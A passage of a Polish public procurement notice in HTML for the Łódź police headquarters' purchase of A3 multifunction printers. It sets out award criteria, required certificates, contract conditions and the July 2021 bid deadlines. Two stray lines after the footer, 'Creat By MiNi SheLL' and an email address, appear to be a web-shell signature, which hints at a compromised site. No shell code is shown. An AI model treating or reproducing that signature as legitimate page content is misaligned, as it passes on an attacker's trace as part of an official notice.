class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji on site</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa urządzeń wielofunkcyjnych formatu A3 w ramach I wyposażenia dla jednostek podległych KWP w Łodzi. <br/>Urządzenie wielofunkcyjne sieciowe A3 mono- 6 szt.<br/>2.	Szczegółowy opis przedmiotu zamówienia ujęto w Załączniku nr 2 do SWZ. Szczegółowe warunki wykonywania zamówienia zawarte są we wzorze umowy, stanowiącym Załącznik nr 5 do SWZ (odpowiednio do zadania).<br/>3.	Wykonawca zobowiązuje się realizować przedmiot zamówienia zgodnie z wymaganiami <br/>w odniesieniu do asortymentu wymienionego w poszczególnych pozycjach Formularza ofertowego, stanowiącego załącznik nr 1.1-1.3. do SWZ.<br/>4.	Wykonawca zobowiązuje się dostarczać towar na własny koszt i własnym transportem do KWP w Łodzi, ul. Lutomierska 108/112 (pomieszczenia w piwnicach).<br/>5.	Przedmiot zamówienia obejmuje również wniesienie dostarczonego sprzętu do wskazanych przez upoważnionych pracowników Zamawiającego pomieszczeń.<br/>6.	Przedmiot zamówienia musi być fabrycznie nowy, kompletny, wolny od wad. Musi spełniać wymogi Polskich Norm. Wykonawca zobowiązany będzie okazać na żądanie Zamawiającego aprobatę, atest lub certyfikat, o ile taki jest wymagany przez obowiązujące przepisy prawa.<br/>7.	Przedmiot zamówienia zostanie przyjęty przez Zamawiającego w obecności Wykonawcy po sprawdzeniu ilościowym i jakościowym dostawy oraz zgodności dostawy ze Szczegółowym opisem przedmiotu zamówienia stanowiącym załącznik nr 2 do SWZ.<br/>8.	Do dostarczonego sprzętu Wykonawca dostarczy karty gwarancyjne zawierające numer seryjny, termin i warunki ważności gwarancji, adresy i numery telefonów punktów serwisowych świadczących usługi gwarancyjne (dopuszcza się zastosowanie jednej gwarancji zbiorczej).<br/>9.	Podane przez Zamawiającego w SWZ nazwy mają charakter przykładowy a ich wskazanie ma na celu określenie oczekiwanego standardu przy czym Zamawiający dopuszcza składanie ofert równoważnych na podstawie art. 99 ust. 5 ustawy. Nazwy lub symbolika podana została w celu prawidłowego określenia przedmiotu zamówienia. Przedstawiony opis stanowi minimum techniczne i jakościowe przedmiotu zamówienia oczekiwane przez Zamawiającego i będzie stanowił podstawę oceny ofert równoważnych.<br/>10.	Zamawiający dopuszcza składanie ofert równoważnych, wskazując w opisie przedmiotu zamówienia kryteria stosowane w celu oceny równoważności. Zamawiający informuje, iż poprzez określenie: „oferowany produkt równoważny” rozumie, iż oferowany przedmiot zamówienia spełnia wymagania jakościowe, eksploatacyjne i techniczne równoważnie do produktów wskazanych przez Zamawiającego w opisie przedmiotu zamówienia. Oznacza to, że produkt równoważny musi spełniać parametry w stosunku do wymagań minimalnych wskazanych przez Zamawiającego w Opisie Przedmiotu zamówienia „wymagania minimalne” stanowiącym - Załącznik nr 2 do SWZ.<br/>11.	Zamawiający zobowiązuje się do realizacji zamówienia na poziomie nie mniejszym niż 60% wartości umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30121000-3 - Urządzenia fotokopiujące i termokopiujące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty niepodlegające odrzuceniu będą oceniane na podstawie kryterium:<br/>a.	cena oferty brutto /C/ – 60%<br/>b.	okres gwarancji on site- (G) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji on site</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego - wg załącznika nr 4 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Na potwierdzenie, że oferowane dostawy spełniają określone <br/>przez zamawiającego w dokumentacji zamówienia wymagania, Zamawiający żąda złożenia wraz z ofertą przedmiotowych środków dowodowych:<br/><br/>Dla części 1<br/>1.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych komputerów stacjonarnych.<br/>2.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych monitorów. <br/>3.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych komputerów przenośnych. <br/>4.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych komputerów stacjonarnych.<br/>5.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych monitorów.<br/>6.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych komputerów przenośnych.<br/>7.	Deklaracja CE Producenta lub oświadczenie Producenta potwierdzające spełnienie normy CE przez oferowane komputery stacjonarne.<br/>8.	Deklaracja CE Producenta lub oświadczenie Producenta potwierdzające spełnienie normy CE przez oferowane monitory.<br/>9.	Deklaracja CE Producenta lub oświadczenie Producenta potwierdzające spełnienie normy CE przez oferowane komputery przenośne.<br/>10.	Certyfikat MIL-STD-810G lub oświadczenie Producenta potwierdzające spełnienie normy MIL-STD-810G przez oferowane komputery przenośne.<br/>11.	Oświadczenie Producenta lub wyniki testu w benchmarku PassMark CPU Mark potwierdzające spełnienie wymaganego wyniku punktowego przez procesor zastosowany <br/>w oferowanych komputerach stacjonarnych.<br/>12.	Oświadczenie Producenta lub wyniki testu w benchmarku PassMark CPU Mark potwierdzające spełnienie wymaganego wyniku punktowego przez procesor zastosowany <br/>w oferowanych komputerach przenośnych.<br/><br/>Dla części 2<br/>1.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych drukarek sieciowych A4 mono.<br/>2.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych urządzeń wielofunkcyjnych sieciowych A4 mono. <br/>3.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych drukarek sieciowych A4 mono.<br/>4.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych urządzeń wielofunkcyjnych sieciowych A4 mono.<br/><br/>Dla części 3<br/>1.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych urządzeń wielofunkcyjnych sieciowych A3 mono. <br/>2.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych urządzeń wielofunkcyjnych sieciowych A3 mono.<br/><br/><br/>Na podstawie art. 20 ust. 3 uPzp, ze względu na techniczny charakter w/w dokumentów, Zamawiający dopuszcza, aby w/w dokumenty zostały złożone w języku polskim lub w języku powszechnie używanym w handlu międzynarodowym tj. w języku angielskim, za wyjątkiem sytuacji składania oświadczeń Producenta, które w takim wypadku muszą zostać złożone w języku polskim. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dla części 1<br/>1.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych komputerów stacjonarnych.<br/>2.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych monitorów. <br/>3.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych komputerów przenośnych. <br/>4.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych komputerów stacjonarnych.<br/>5.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych monitorów.<br/>6.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych komputerów przenośnych.<br/>7.	Deklaracja CE Producenta lub oświadczenie Producenta potwierdzające spełnienie normy CE przez oferowane komputery stacjonarne.<br/>8.	Deklaracja CE Producenta lub oświadczenie Producenta potwierdzające spełnienie normy CE przez oferowane monitory.<br/>9.	Deklaracja CE Producenta lub oświadczenie Producenta potwierdzające spełnienie normy CE przez oferowane komputery przenośne.<br/>10.	Certyfikat MIL-STD-810G lub oświadczenie Producenta potwierdzające spełnienie normy MIL-STD-810G przez oferowane komputery przenośne.<br/>11.	Oświadczenie Producenta lub wyniki testu w benchmarku PassMark CPU Mark potwierdzające spełnienie wymaganego wyniku punktowego przez procesor zastosowany <br/>w oferowanych komputerach stacjonarnych.<br/>12.	Oświadczenie Producenta lub wyniki testu w benchmarku PassMark CPU Mark potwierdzające spełnienie wymaganego wyniku punktowego przez procesor zastosowany <br/>w oferowanych komputerach przenośnych.<br/><br/>Dla części 2<br/>1.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych drukarek sieciowych A4 mono.<br/>2.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych urządzeń wielofunkcyjnych sieciowych A4 mono. <br/>3.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych drukarek sieciowych A4 mono.<br/>4.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych urządzeń wielofunkcyjnych sieciowych A4 mono.<br/><br/>Dla części 3<br/>1.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 9001 przez Producenta oferowanych urządzeń wielofunkcyjnych sieciowych A3 mono. <br/>2.	Certyfikat lub oświadczenie Producenta potwierdzające spełnienie normy ISO 14001 przez Producenta oferowanych urządzeń wielofunkcyjnych sieciowych A3 mono. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (konsorcjum, spółka cywilna lub osoby fizyczne działające wspólnie) należy złożyć:<br/>-pełnomocnictwo, w którym Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia (art. 58 ust. 2 uPzp);<br/>-dokumenty określone w pkt. 11.2.1 i 11.2.2 SWZ – złożone przez każdego z wykonawców wspólnie ubiegających się o zamówienie;<br/>-Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na „Wykonawcę”, w miejscu np. „nazwa i adres Wykonawcy” należy wpisać dane dotyczące podmiotu wspólnego, a nie pełnomocnika (lidera). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określono we wzorze umowy- załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę poprzez platformę dedykowaną dla niniejszego postępowania na stronie Platformy zakupowej https://platformazakupowa.pl/pn/kwp_lodz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-21</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-14 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com